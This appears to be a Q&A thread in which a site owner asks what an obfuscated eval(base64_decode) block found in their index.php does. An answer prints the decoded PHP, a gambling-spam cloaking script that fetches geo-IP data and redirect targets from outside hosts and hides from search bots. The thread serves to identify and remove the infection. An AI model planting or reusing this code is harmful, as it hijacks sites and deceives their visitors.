-3

Hello i found my site had this code in index.php Any one can translate this code please?

eval(base64_decode('CiBnb3RvIEV1SU45OyBZU1NPRDogJGNlayA9IGZpbGVfZ2V0X2NvbnRlbnRzKCJceDY4XHg3NFwxNjRcMTYwXHg3M1w3Mlx4MmZcNTdcMTUyXHg3M1x4NmZcMTU2XHgyZVwxNDdceDY1XDE1N1wxNTFceDcwXHg2Y1x4NmZceDZmXDE1M1wxNjVceDcwXHgyZVwxNTFcMTU3XHgyZiIgLiAkaXApOyBnb3RvIGdUcjNXOyBnWFVUSzogZGF0ZV9kZWZhdWx0X3RpbWV6b25lX3NldCgiXHg0MVwxNjNcMTUxXDE0MVx4MmZceDQyXDE0MVwxNTZceDY3XDE1M1wxNTdcMTUzIik7IGdvdG8gSUhOQlg7IFhpWXZPOiBpZiAoJGNsb2Fja2luZyAhPSAiXDExN1x4NGUiKSB7IGluY2x1ZGUgJG5vbmp1ZGk7IGRpZTsgfSBlbHNlIHsgaWYgKGluX2FycmF5KCRjb3VudHJ5Y29kZSwgJG5lZ2FyYSkgJiYgaXNtb2JpbGUoJG9ubHltb2JpbGUpICYmIGdjbGlkKCRvbmx5Z2NsaWQpKSB7IGluY2x1ZGUgJGp1ZGk7IH0gZWxzZSB7IGlmIChpbl9hcnJheSgkaXAsICRiYW5pcCkpIHsgaW5jbHVkZSAkbm9uanVkaTsgfSBlbHNlIHsgaWYgKGluX2FycmF5KCRpcCwgJHdsaXApKSB7IGluY2x1ZGUgJGp1ZGk7IH0gZWxzZSB7IGlmIChzdHJwb3Moc3RydG9sb3dlcigkaHR0cF91c2VyX2FnZW50KSwgZ29vZ2xlKSAhPT0gZmFsc2UgfHwgc3RycG9zKHN0cnRvbG93ZXIoJGh0dHBfdXNlcl9hZ2VudCksIGJvdCkgIT09IGZhbHNlIHx8IHN0cnBvcyhzdHJ0b2xvd2VyKCRob3N0KSwgZ29vZ2xlKSAhPT0gZmFsc2UpIHsgaW5jbHVkZSAkbm9uanVkaTsgfSBlbHNlIHsgaW5jbHVkZSAkbm9uanVkaTsgfSB9IH0gfSB9IGdvdG8gWm9NSmo7IFNWNERFOiAkcmVmZXJlciA9IGlzc2V0KCRfU0VSVkVSWyJceDQ4XDEyNFwxMjRcMTIwXHg1ZlwxMjJceDQ1XHg0Nlx4NDVceDUyXHg0NVx4NTIiXSkgPyAkX1NFUlZFUlsiXHg0OFx4NTRceDU0XDEyMFwxMzdceDUyXHg0NVx4NDZcMTA1XDEyMlx4NDVceDUyIl0gOiAnJzsgZ290byBnNjlkZTsgZHRQSW06IGlmICghaXNzZXQoJGlwKSkgeyAkaXAgPSAkX1NFUlZFUlsiXDEyMlx4NDVceDRkXDExN1x4NTRceDQ1XDEzN1x4NDFceDQ0XDEwNFx4NTIiXTsgfSBnb3RvIFJTaUViOyBLcUVQbDogJHdlYl9wYWdlID0gJF9TRVJWRVJbIlx4NTNceDQzXDEyMlwxMTFcMTIwXDEyNFx4NWZceDRlXDEwMVwxMTVcMTA1Il07IGdvdG8gQkVDSkg7IGc2OWRlOiAkaHR0cF91c2VyX2FnZW50ID0gaXNzZXQoJF9TRVJWRVJbIlwxMTBceDU0XHg1NFx4NTBcMTM3XDEyNVwxMjNceDQ1XDEyMlx4NWZceDQxXHg0N1x4NDVceDRlXDEyNCJdKSA/ICRfU0VSVkVSWyJcMTEwXHg1NFwxMjRceDUwXDEzN1x4NTVceDUzXHg0NVwxMjJcMTM3XDEwMVx4NDdcMTA1XDExNlwxMjQiXSA6ICJcMTU2XDE1N1x4MjBcMTI1XHg3M1wxNDVcMTYyXDU1XHg2MVx4NjdcMTQ1XHg2ZVwxNjQiOyBnb3RvIEtxRVBsOyBSU2lFYjogJHBsID0gZmlsZV9nZXRfY29udGVudHMoIlx4NjhcMTY0XDE2NFwxNjBceDczXHgzYVw1N1w1N1wxNTRceDZmXDE1M1x4NmNceDY5XDE0MVx4NzVceDJlXHg2M1x4NmZceDZkXHgyZlx4NjNceDZjXHg2Zlx4NjFcMTUzXDU1XHg2MVx4NzBcMTUxXHgyZiIgLiAkUFRDb2RlKTsgZ290byBDQWNvaDsgSUhOQlg6ICRpcCA9ICRfU0VSVkVSWyJcMTEwXDEyNFx4NTRcMTIwXHg1ZlwxMDNceDQ2XHg1ZlwxMDNcMTE3XDExNlwxMTZceDQ1XDEwM1x4NTRcMTExXHg0ZVx4NDdcMTM3XHg0OVx4NTAiXTsgZ290byBkdFBJbTsgTHBxV006ICRob3N0ID0gJGlzcDsgZ290byBYaVl2TzsgRXVJTjk6IGluY2x1ZGUgIlwxNjNceDY1XHg3NFwxNjVceDcwXDU2XDE2MFwxNTBcMTYwIjsgZ290byBnWFVUSzsgQWpmMTg6IGZ1bmN0aW9uIGdjbGlkKCRnKSB7IGlmICgkZyA9PSAiXDEzMVwxMDEiKSB7IGlmIChpc3NldCgkX0dFVFsiXHg2N1x4NjNcMTU0XDE1MVx4NjQiXSkgJiYgIWVtcHR5KCRfR0VUWyJcMTQ3XDE0M1x4NmNceDY5XHg2NCJdKSAmJiBzdHJsZW4oJF9HRVRbIlwxNDdcMTQzXDE1NFwxNTFceDY0Il0pID4gMzIpIHsgcmV0dXJuIHRydWU7IH0gZWxzZSB7IHJldHVybiBmYWxzZTsgfSB9IGVsc2UgeyByZXR1cm4gdHJ1ZTsgfSB9IGdvdG8gWVNTT0Q7IEJFQ0pIOiAkZG9tYWluID0gJF9TRVJWRVJbIlx4NTNcMTA1XHg1MlwxMjZcMTA1XHg1MlwxMzdceDRlXHg0MVwxMTVceDQ1Il07IGdvdG8gTHBxV007IENBY29oOiAkbyA9IGpzb25fZGVjb2RlKCRwbCk7IGdvdG8gaFFMYzg7IHVoNWhfOiBpZiAoIWluX2FycmF5KCRfU0VSVkVSWyJceDQ4XHg1NFx4NTRceDUwXHg1ZlwxMTBceDRmXDEyM1wxMjQiXSwgJGxpc3QpKSB7IGhlYWRlcigiXHg0Y1wxNTdceDYzXHg2MVx4NzRcMTUxXHg2ZlwxNTZcNzJcNDAiIC4gJGZibFswXSk7IGRpZTsgfSBnb3RvIGJJTnB0OyBnVHIzVzogJHN0YXR1cyA9IGpzb25fZGVjb2RlKCRjZWspLT5zdWNjZXNzOyBnb3RvIHQ4MFV1OyBoUUxjODogJGxpc3QgPSAkby0+bGlzdDsgZ290byBCVkhZejsgYklOcHQ6IGZ1bmN0aW9uIGlzbW9iaWxlKCRtKSB7IGlmICgkbSA9PSAiXHg1OVx4NDEiKSB7IHJldHVybiBwcmVnX21hdGNoKCJcNTdceDI4XHg2MVwxNTZcMTQ0XHg3MlwxNTdceDY5XDE0NFx4N2NcMTQxXHg3Nlx4NjFcMTU2XHg3NFwxNDdcMTU3XHg3Y1wxNDJceDZjXHg2MVwxNDNceDZiXDE0MlwxNDVceDcyXHg3Mlx4NzlcMTc0XHg2Mlx4NmZcMTU0XDE2NFx4N2NceDYyXHg2ZlwxNTdceDczXDE2NFwxNzRceDYzXHg3Mlx4NjlcMTQzXDE1M1wxNDVcMTY0XDE3NFwxNDRceDZmXDE0M1x4NmZceDZkXDE1N1x4N2NcMTQ2XDE1N1wxNTZcMTQ1XHg3Y1wxNTBceDY5XDE2MFx4NzRceDZmXHg3MFwxNzRceDZkXHg2OVwxNTZceDY5XDE3NFwxNTVceDZmXHg2MlwxNTFceDdjXHg3MFx4NjFcMTU0XHg2ZFx4N2NceDcwXDE1MFx4NmZcMTU2XDE0NVwxNzRcMTYwXDE1MVwxNDVceDdjXHg3NFx4NjFcMTQyXHg2Y1wxNDVceDc0XHg3Y1wxNjVceDcwXDEzNFw1NlwxNDJcMTYyXDE1N1wxNjdcMTYzXHg2NVx4NzJceDdjXDE2NVwxNjBceDVjXHgyZVwxNTRceDY5XHg2ZVwxNTNceDdjXHg3N1wxNDVceDYyXHg2Zlx4NzNceDdjXDE2N1wxNTdcMTYzXDUxXDU3XDE1MSIsICRfU0VSVkVSWyJceDQ4XHg1NFx4NTRcMTIwXHg1ZlwxMjVcMTIzXHg0NVwxMjJceDVmXHg0MVwxMDdcMTA1XDExNlx4NTQiXSk7IH0gZWxzZSB7IHJldHVybiB0cnVlOyB9IH0gZ290byBBamYxODsgQlZIWXo6ICRmYmwgPSAkby0+bGluazsgZ290byB1aDVoXzsgdDgwVXU6IGlmICgkc3RhdHVzICE9IHRydWUpIHsgJGlwYXBpID0gZmlsZV9nZXRfY29udGVudHMoIlwxNTBceDc0XHg3NFwxNjBceDNhXDU3XHgyZlwxNTFceDcwXDU1XHg2MVx4NzBceDY5XHgyZVx4NjNceDZmXDE1NVx4MmZcMTUyXDE2M1wxNTdcMTU2XHgyZiIgLiAkaXApOyAkY291bnRyeSA9IGpzb25fZGVjb2RlKCRpcGFwaSktPmNvdW50cnk7ICRjb3VudHJ5Y29kZSA9IGpzb25fZGVjb2RlKCRpcGFwaSktPmNvdW50cnlDb2RlOyAkY2l0eSA9IGpzb25fZGVjb2RlKCRpcGFwaSktPmNpdHk7ICRvcmcgPSBqc29uX2RlY29kZSgkY2VrKS0+b3JnOyAkaXNwID0ganNvbl9kZWNvZGUoJGNlayktPmlzcDsgfSBlbHNlIHsgJGNvdW50cnkgPSBqc29uX2RlY29kZSgkY2VrKS0+Y291bnRyeV9uYW1lOyAkY291bnRyeWNvZGUgPSBqc29uX2RlY29kZSgkY2VrKS0+Y291bnRyeV9jb2RlOyAkY2l0eSA9IGpzb25fZGVjb2RlKCRjZWspLT5jaXR5OyAkb3JnID0ganNvbl9kZWNvZGUoJGNlayktPmFzbl9vcmc7ICRpc3AgPSBqc29uX2RlY29kZSgkY2VrKS0+aXNwOyB9IGdvdG8gU1Y0REU7IFpvTUpqOiA='));
prapin
  • 6,395
  • 5
  • 26
  • 44
Hendy Mylor
  • 1
  • 2
    [How do I deal with a compromised server?](https://security.stackexchange.com/questions/39231/how-do-i-deal-with-a-compromised-server) – ADyson Oct 19 '22 at 11:16

1 Answers1

-1

Edit:

The output of the base64 seems fishy. Someone try to inject obfuscated codes through eval() function.

decoded base64 output:

 goto EuIN9; YSSOD: $cek = file_get_contents("\x68\x74\164\160\x73\72\x2f\57\152\x73\x6f\156\x2e\147\x65\157\151\x70\x6c\x6f\x6f\153\165\x70\x2e\151\157\x2f" . $ip); goto gTr3W; gXUTK: date_default_timezone_set("\x41\163\151\141\x2f\x42\141\156\x67\153\157\153"); goto IHNBX; XiYvO: if ($cloacking != "\117\x4e") { include $nonjudi; die; } else { if (in_array($countrycode, $negara) && ismobile($onlymobile) && gclid($onlygclid)) { include $judi; } else { if (in_array($ip, $banip)) { include $nonjudi; } else { if (in_array($ip, $wlip)) { include $judi; } else { if (strpos(strtolower($http_user_agent), google) !== false || strpos(strtolower($http_user_agent), bot) !== false || strpos(strtolower($host), google) !== false) { include $nonjudi; } else { include $nonjudi; } } } } } goto ZoMJj; SV4DE: $referer = isset($_SERVER["\x48\124\124\120\x5f\122\x45\x46\x45\x52\x45\x52"]) ? $_SERVER["\x48\x54\x54\120\137\x52\x45\x46\105\122\x45\x52"] : ''; goto g69de; dtPIm: if (!isset($ip)) { $ip = $_SERVER["\122\x45\x4d\117\x54\x45\137\x41\x44\104\x52"]; } goto RSiEb; KqEPl: $web_page = $_SERVER["\x53\x43\122\111\120\124\x5f\x4e\101\115\105"]; goto BECJH; g69de: $http_user_agent = isset($_SERVER["\110\x54\x54\x50\137\125\123\x45\122\x5f\x41\x47\x45\x4e\124"]) ? $_SERVER["\110\x54\124\x50\137\x55\x53\x45\122\137\101\x47\105\116\124"] : "\156\157\x20\125\x73\145\162\55\x61\x67\145\x6e\164"; goto KqEPl; RSiEb: $pl = file_get_contents("\x68\164\164\160\x73\x3a\57\57\154\x6f\153\x6c\x69\141\x75\x2e\x63\x6f\x6d\x2f\x63\x6c\x6f\x61\153\55\x61\x70\151\x2f" . $PTCode); goto CAcoh; IHNBX: $ip = $_SERVER["\110\124\x54\120\x5f\103\x46\x5f\103\117\116\116\x45\103\x54\111\x4e\x47\137\x49\x50"]; goto dtPIm; LpqWM: $host = $isp; goto XiYvO; EuIN9: include "\163\x65\x74\165\x70\56\160\150\160"; goto gXUTK; Ajf18: function gclid($g) { if ($g == "\131\101") { if (isset($_GET["\x67\x63\154\151\x64"]) && !empty($_GET["\147\143\x6c\x69\x64"]) && strlen($_GET["\147\143\154\151\x64"]) > 32) { return true; } else { return false; } } else { return true; } } goto YSSOD; BECJH: $domain = $_SERVER["\x53\105\x52\126\105\x52\137\x4e\x41\115\x45"]; goto LpqWM; CAcoh: $o = json_decode($pl); goto hQLc8; uh5h_: if (!in_array($_SERVER["\x48\x54\x54\x50\x5f\110\x4f\123\124"], $list)) { header("\x4c\157\x63\x61\x74\151\x6f\156\72\40" . $fbl[0]); die; } goto bINpt; gTr3W: $status = json_decode($cek)->success; goto t80Uu; hQLc8: $list = $o->list; goto BVHYz; bINpt: function ismobile($m) { if ($m == "\x59\x41") { return preg_match("\57\x28\x61\156\144\x72\157\x69\144\x7c\141\x76\x61\156\x74\147\157\x7c\142\x6c\x61\143\x6b\142\145\x72\x72\x79\174\x62\x6f\154\164\x7c\x62\x6f\157\x73\164\174\x63\x72\x69\143\153\145\164\174\144\x6f\143\x6f\x6d\157\x7c\146\157\156\145\x7c\150\x69\160\x74\x6f\x70\174\x6d\x69\156\x69\174\155\x6f\x62\151\x7c\x70\x61\154\x6d\x7c\x70\150\x6f\156\145\174\160\151\145\x7c\x74\x61\142\x6c\145\x74\x7c\165\x70\134\56\142\162\157\167\163\x65\x72\x7c\165\160\x5c\x2e\154\x69\x6e\153\x7c\x77\145\x62\x6f\x73\x7c\167\157\163\51\57\151", $_SERVER["\x48\x54\x54\120\x5f\125\123\x45\122\x5f\x41\107\105\116\x54"]); } else { return true; } } goto Ajf18; BVHYz: $fbl = $o->link; goto uh5h_; t80Uu: if ($status != true) { $ipapi = file_get_contents("\150\x74\x74\160\x3a\57\x2f\151\x70\55\x61\x70\x69\x2e\x63\x6f\155\x2f\152\163\157\156\x2f" . $ip); $country = json_decode($ipapi)->country; $countrycode = json_decode($ipapi)->countryCode; $city = json_decode($ipapi)->city; $org = json_decode($cek)->org; $isp = json_decode($cek)->isp; } else { $country = json_decode($cek)->country_name; $countrycode = json_decode($cek)->country_code; $city = json_decode($cek)->city; $org = json_decode($cek)->asn_org; $isp = json_decode($cek)->isp; } goto SV4DE; ZoMJj:
rafathasan
  • 524
  • 3
  • 15
  • so what is that code? i really dont know how to translate that, i only know PHP code. How can it run in php code? – Hendy Mylor Oct 19 '22 at 10:41
  • @HendyMylor you could run it with `eval()`, just like in your own example...but that's really not a good idea - never execute code you don't understand. What you _do_ need to try and understand is how it might have got there, and how to prevent that from happening again. The fact there's code that you don't know anything about existing on your website is a really bad sign for your security. You should assume it's malicious, and delete it without executing it yourself, and take steps to prevent it from being put there again. – ADyson Oct 19 '22 at 11:17